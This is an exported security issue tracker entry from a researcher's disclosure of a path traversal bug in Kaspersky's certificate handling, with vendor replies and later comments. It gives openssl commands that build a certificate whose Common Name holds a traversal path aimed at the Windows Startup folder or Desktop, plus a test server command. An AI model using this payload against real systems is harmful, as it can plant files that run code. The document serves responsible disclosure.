Kaspersky Antivirus Certificate handling path traversal

[GoogleCodeExporter]

When Kaspersky https inspection is enabled, temporary certificates are created 
in %PROGRAMDATA% for validation. I observed that the naming pattern  is 
{CN}.cer.

I created a certificate with CN="../../../../Users/All Users/Start 
Menu/Startup/foo.bat\x00", browsed to an SSL server presenting that certificate 
and Kaspersky created that certificate name. Jumping from this to code 
execution seems quite straightforward. I didn't try it, but it seems quite easy 
to make some ASN.1/X.509 that is also a valid batch file or some other 
relaxed-parsing format.

Here is how to generate a certificate to reproduce:

$ openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 360
Generating a 2048 bit RSA private key
......................................................................+++
...............+++
writing new private key to 'key.pem'
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:../../../../../Users/All 
Users/Desktop/hello
Email Address []:

Then test start a server like this:

$ openssl s_server -key key.pem  -cert cert.pem -accept 8080

And then navigate to https://host:8080 from the Windows host, and observe a 
certificate called hello.cer on the desktop. I attached a screenshot to 
demonstrate. I can't believe this actually worked, note that it's not necessary 
to click or interact with anything to produce the file.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by tav...@google.com on 18 Sep 2015 at 11:13

Attachments:

• [Windows 7 x64-2015-09-18-16-06-39.png](https://storage.googleapis.com/google-code-attachments/google-security-research/issue-539/comment-0/Windows 7 x64-2015-09-18-16-06-39.png)

[GoogleCodeExporter]

Update from Kaspersky:

Hi Tavis,

Thank you for reporting this vulnerability to us! We confirm the bug with 
Certificate handling path traversal.
We are working on creating a fix. I’ll let you know our fix plan for the bug 
as soon as we align it internally.

Best regards,
Igor

Original comment by tav...@google.com on 21 Sep 2015 at 9:11

[GoogleCodeExporter]

I believe this issue is scheduled to be fixed today, I'm testing it in a VM now.

Original comment by tav...@google.com on 9 Oct 2015 at 6:13

[GoogleCodeExporter]

Final fix was released on November 16th.

Original comment by tav...@google.com on 16 Nov 2015 at 7:25

• Changed state: Fixed
• Removed labels: Restrict-View-Commit

[GoogleCodeExporter]

Hello Tavis, 

If possible can you help me with the following:

How were you able to write a .bat file? I am only able create .cer files. 
Including the null character '\x00' in the CommonName does not seem to be 
working. What version of Kaspersky was this tested against? 

Original comment by athmi...@gmail.com on 24 Nov 2015 at 5:44

[GoogleCodeExporter]

Also it does not look like the path traversal is fixed on the latest version. 
    Kaspersky is still vulnerable after updating to the latest version.  

Original comment by athmi...@gmail.com on 25 Nov 2015 at 5:08